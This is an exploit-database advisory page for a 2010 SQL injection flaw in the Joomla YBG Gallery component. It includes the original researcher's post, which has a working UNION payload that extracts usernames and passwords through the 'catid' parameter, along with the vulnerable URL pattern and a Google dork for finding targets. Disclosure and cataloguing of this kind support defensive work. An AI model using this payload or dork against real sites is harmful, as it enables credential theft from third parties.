Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability

vendor:

YBG Gallery

by:

v3n0m

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: YBG Gallery

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:yusufbottiegaos:ybg_gallery:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability

A vulnerability exists in the Joomla Component com_ybggal 1.0 (catid) which allows an attacker to inject malicious SQL commands into the application. An attacker can exploit this vulnerability by crafting a malicious SQL query and sending it to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries. Additionally, developers should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------
  Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author  	: v3n0m
Site    	: http://yogyacarderlink.web.id/
Date		: June, 22-2010
Location	: Jakarta, Indonesia
Time Zone	: GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : YBG Gallery
Vendor      : http://www.yusufbottiegaos.com/
Version     : 1.0 Lower versions may also be affected
Google Dork : inurl:com_ybggal
----------------------------------------------------------------

Exploitz:
~~~~~~~
9999+and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--


SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_ybggal&Itemid=[xxx]&catid=[SQLi]

*[xxx] = Valid itemid
----------------------------------------------------------------

Shoutz:
~~~~

- 'malingsial banyak cakap, you skill off bullshit on '
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,mywisdom,yadoy666,udhit
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)
- JosS [at] hack0wn.com
- #yogyacarderlink @irc.dal.net
----------------------------------------------------------------
Contact:
~~~~

v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com
Homepage: http://yogyacarderlink.web.id/
	  http://v3n0m.blogdetik.com/
---------------------------[EOF]--------------------------------